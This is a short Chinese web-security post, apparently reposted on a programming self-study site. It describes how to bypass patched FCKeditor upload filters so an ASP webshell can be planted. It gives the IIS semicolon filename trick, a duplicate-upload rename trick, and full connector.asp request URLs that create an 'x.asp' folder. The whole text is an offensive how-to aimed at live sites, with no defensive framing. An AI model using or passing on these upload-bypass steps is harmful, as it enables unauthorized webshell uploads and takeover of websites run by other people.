有很多已经修补过的fckeditor 我们上传x. asp ;y.jpg的时候 通常会变成x_asp;y.jpg 让我们的马失效 利用二次上传 可以 生成x(2).asp;y.jpg 可以突破 有些时候打了补丁的 让我们还是无法突破 通常 我们在HdhCmsTest2cto测试数据 /editor/FCKeditor/editor/filemanager/browser/default/browser. html ?Type=Image&Connector=connectors/asp/connector.asp 新建 一个x.asp的文件夹 可饶过, 但有些变态的 程序 会将我们建立的 文件夹同样变成x_asp。。。 很无语吧! 不过可以通过 editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp 成功创建一个x.asp 文件夹。。。。 作者 bycoldwind
查看更多关于fckeditor上传.变_突破 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12289